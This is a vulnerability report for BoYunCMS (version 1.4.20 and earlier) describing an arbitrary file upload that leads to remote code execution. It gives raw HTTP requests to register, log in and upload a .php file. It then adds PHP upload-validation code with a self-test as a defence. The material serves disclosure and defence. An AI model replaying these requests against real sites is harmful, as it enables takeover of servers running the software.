BoYunCMS: Arbitrary File Upload vulnerability in application/user/controller/Index.php


BUG_Author: YELEIPENG

Affected version: ≤1.4.20

Vendor: https://www.boyunweb.cn/

Software: https://www.boyunweb.cn/pc/index57/index/classid/26/id/42.html

Vulnerability File:

  • /application/user/controller/Index.php

Description:

1. Take a look at the function add in application/user/controller/Index.php.

Decode it, then check the code.

We can upload any file there.

2. Register a user.

POST /user/Index/reg HTTP/1.1
Host: byphpcms2.lab.wetolink.com
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=r8q479jba5ona5n0jud7a459n6
Content-Length: 27

username=test&password=test

3. Then log in with the captcha.

POST /user/Index/login HTTP/1.1
Host: byphpcms2.lab.wetolink.com
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=r8q479jba5ona5n0jud7a459n6
Content-Length: 40

username=test&password=test&captcha=tutt

4. Then upload a file.

POST /user/Index/upload HTTP/1.1
Host: byphpcms2.lab.wetolink.com
Cookie: PHPSESSID=r8q479jba5ona5n0jud7a459n6
Content-Length: 231
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="image"; filename="/D:/Users/glzjin/Downloads/Untitled-33.php"
Content-Type: <Content-Type header here>

(data)
------WebKitFormBoundary7MA4YWxkTrZu0gW--

5. Now we can access the uploaded .php file.

RCEed.
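
A server-side check that would reject the upload request shown above, given as an added example: it is not BoYunCMS code and not the vendor's fix. The helper names, the allow-list and the sample files are assumptions made for illustration.

```php
<?php
// Added example, not BoYunCMS code. Assumes PHP 7.1+ with the fileinfo extension.
// Allow-list: permitted extension => MIME type the file's bytes must sniff as.
const ALLOWED_IMAGES = [
    'jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
    'png' => 'image/png',  'gif'  => 'image/gif',
];

// Validate one upload and return a server-generated file name (hypothetical helper).
function safe_image_name(string $clientName, string $tmpPath): string
{
    // Drop any client-supplied directory part and keep only the final extension.
    $ext = strtolower(pathinfo(basename(str_replace('\\', '/', $clientName)), PATHINFO_EXTENSION));
    if (!isset(ALLOWED_IMAGES[$ext])) {
        throw new RuntimeException("extension not allowed: '$ext'");
    }
    // Sniff the type from the bytes; the request's Content-Type is client-controlled.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($mime !== ALLOWED_IMAGES[$ext]) {
        throw new RuntimeException("content is $mime, not " . ALLOWED_IMAGES[$ext]);
    }
    return bin2hex(random_bytes(16)) . '.' . $ext; // never reuse the client's name on disk
}

// Store a $_FILES entry (e.g. $_FILES['image']) under $destDir (hypothetical helper).
function store_upload(array $file, string $destDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    $name = safe_image_name($file['name'], $file['tmp_name']);
    if (!move_uploaded_file($file['tmp_name'], rtrim($destDir, '/') . '/' . $name)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}

// Constructed samples, run from the CLI only: a plain-text file and a 1x1 PNG.
if (PHP_SAPI === 'cli') {
    $txt = tempnam(sys_get_temp_dir(), 'up'); file_put_contents($txt, "not an image\n");
    $png = tempnam(sys_get_temp_dir(), 'up');
    file_put_contents($png, base64_decode('iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg=='));
    $cases = [['/D:/Users/glzjin/Downloads/Untitled-33.php', $txt], ['a.png', $txt], ['a.png', $png]];
    foreach ($cases as [$name, $path]) {
        try { echo $name, ' -> stored as ', safe_image_name($name, $path), PHP_EOL; }
        catch (RuntimeException $e) { echo $name, ' -> rejected: ', $e->getMessage(), PHP_EOL; }
    }
    unlink($txt); unlink($png);
}
```

Validation alone is one layer: storing uploads outside the web root, or in a directory where the web server does not execute PHP, keeps a file that slips through from being run when requested.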